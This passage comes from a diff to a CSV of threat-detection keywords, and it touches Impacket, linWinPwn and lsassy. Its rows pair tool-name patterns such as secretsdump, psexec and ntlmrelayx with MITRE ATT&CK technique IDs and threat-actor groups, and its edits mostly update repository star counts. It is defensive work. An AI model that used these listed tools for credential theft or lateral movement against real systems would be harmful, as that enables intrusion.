movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket:latest*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket__init__*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket_findDelegation*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*impacket_rpcdump_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*impacket-atexec*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-dcomexec*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketfile.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*impacket-GetADUsers*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-GetNPUsers*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-getST*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-getTGT*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketldap_shell*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketlogger*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-lookupsid*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketmssqlshell*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-netview*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketntlmrelayx*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketos_ident*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-psexec*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-reg*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-reg*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library","T1071.001 - T1071.002 - T1071.004 - T1071.005 ","TA0005 - TA0006","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","POST Exploitation tools","https://github.com/SecureAuthCorp/impacket","1","1","N/A","N/A","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketremcomsvc*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketrpcdatabase*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-rpcdump*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-samrdump*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketsecretsdump*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-secretsdump*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*impacket-secretsdump*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*impacketserviceinstall*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket-services*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacketsmbclient*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket-smbclient*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket-smbserver*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket-ticketer*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacketutils*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketserviceinstall*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-services*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketsmbclient*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-smbclient*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-smbserver*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-ticketer*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketutils*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*impacket-wmiexec*","offensive_tool_keyword","AD exploitation cheat sheet","Command execution with WMI From Linux","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*impacket-wmiexec*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library","T1071.001 - T1071.002 - T1071.004 - T1071.005 ","TA0005 - TA0006","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","POST Exploitation tools","https://github.com/SecureAuthCorp/impacket","1","1","N/A","N/A","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*ImpactDecoder*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*ImpactPacket*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-wmiexec*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the 